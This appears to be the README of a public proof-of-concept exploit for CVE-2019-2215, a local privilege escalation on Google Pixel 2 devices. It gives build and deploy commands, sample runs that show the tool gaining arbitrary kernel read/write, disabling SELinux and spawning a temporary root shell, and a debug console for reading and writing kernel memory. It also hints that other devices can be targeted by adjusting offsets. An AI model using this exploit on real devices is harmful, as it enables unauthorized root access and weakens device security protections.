(Based on a proof-of-concept by Jann Horn & Maddie Stone of Google Project Zero)
Demonstration of a kernel memory R/W-only privilege escalation attack resulting in a temporary root shell.
It works on Google Pixel 2/Pixel 2 XL (walleye/taimen) devices running the September 2019 QP1A.190711.020 image with kernel version-BuildID 4.4.177-g83bee1dc48e8
.
For this tool to work on other devices and/or kernels affected by the same vulnerability, some offsets need to be found and changed. As mentioned on the Project Zero bugtracker, this isn't terribly difficult.
Also included is a mini debug console that provides a hex editor-like interface for touching kernel memory and the ability to spawn a shell.
For convenience, a Makefile
is included that works with the cross-compiler toolchain from Android NDK r19 or higher.
# Download the Android NDK.
user@host:~$ wget https://dl.google.com/android/repository/android-ndk-r20-linux-x86_64.zip
# Extract the NDK and set its path as $ANDROID_NDK_HOME.
user@host:~$ unzip android-ndk-r20-linux-x86_64.zip
user@host:~$ rm android-ndk-r20-linux-x86_64.zip # optional
user@host:~$ export ANDROID_NDK_HOME=~/android-ndk-r20
# Clone the `cve-2019-2215` git repository and `cd` into it.
user@host:~$ git clone https://github.com/kangtastic/cve-2019-2215.git
user@host:~$ cd cve-2019-2215
# Compile the binary.
user@host:~/cve-2019-2215$ make all # all, clean, debug, debug-static, static, strip
user@host:~/cve-2019-2215$ file cve-2019-2215
cve-2019-2215: ELF 64-bit LSB shared object, ARM aarch64, version 1 (SYSV),
dynamically linked, interpreter /system/, stripped
(sample outputs captured on a Pixel 2 XL via adb)
Once the binary is compiled, transfer it onto the device, set it executable, and run it. (Somewhere in /data/
should work.)
taimen:/ $ cd /data/local/tmp
taimen:/data/local/tmp $ install -m 755 /sdcard/cve-2019-2215 ./
taimen:/data/local/tmp $ ./cve-2019-2215
Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
[+] startup
[+] find kernel address of current task_struct
[+] obtain arbitrary kernel memory R/W
[+] find kernel base address
[+] bypass SELinux and patch current credentials
taimen:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),
1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),
3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:kernel:s0
taimen:/data/local/tmp # getenforce
Permissive
taimen:/data/local/tmp # exit
taimen:/data/local/tmp $
Success is not guaranteed and the device may even outright crash, but usually, SELinux is set Permissive
and a root shell is spawned.
Pass debug
as the sole command-line argument to start a mini debug console instead of the privilege escalation routine after kernel R/W is achieved.
debug> help
quick help
print
print kernel base address, some kernel symbol offsets,
and address of current task_struct as hexstrings
read <kaddr> <len>
read <len> bytes from <kaddr> and display as a hexdump
<kaddr> is a hexstring not prefixed with 0x
<len> is 1-4096 or 0x1-0x1000
write <kaddr> <data>
write <data> to <kaddr>
<kaddr> is a hexstring not prefixed with 0x
<data> is 1-4096 hexbytes, spaces ignored, to be written *AS-IS*
e.g. if kaddr 0xffffffffdeadbeef contains an int, and you want to set
its value to 1, enter 'write ffffffffdeadbeef <data>', where <data> is
'01000000', '0100 0000', '01 00 0 0 00', etc. (our ARM is little-endian)
shell
launch a shell (hint: did we ~somehow~ become another user? :P)
help
print this help
exit
exit debug console
Set SELinux from Permissive
back to Enforcing
as an unprivileged user.
taimen:/data/local/tmp $ getenforce
Permissive
taimen:/data/local/tmp $ ./cve-2019-2215 debug
Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
[+] startup
[+] find kernel address of current task_struct
[+] obtain arbitrary kernel memory R/W
[+] find kernel base address
launching debug console, enter 'help' for quick help
debug> print
ffffff9bad880000 kernel_base
ffffff9baf8a57d0 init_task
ffffff9baf8af2c8 init_user_ns
ffffff9baf8e3780 selinux_enabled
ffffff9bafc4e4a8 selinux_enforcing
ffffffe6b2942b80 current
debug> read ffffff9bafc4e4a8 35
ffffff9bafc4e4a8: 0000 0000 0100 0000 002e 40b9 faff ffff ..........@.....
ffffff9bafc4e4b8: 0023 40b9 faff ffff 0000 0000 0000 0000 .#@.............
ffffff9bafc4e4c8: 0000 00 ...
debug> write ffffff9bafc4e4a8 01 00 00 00
debug> read ffffff9bafc4e4a8 4
ffffff9bafc4e4a8: 0100 0000 ....
debug> exit
taimen:/data/local/tmp $ getenforce
Enforcing
taimen:/data/local/tmp $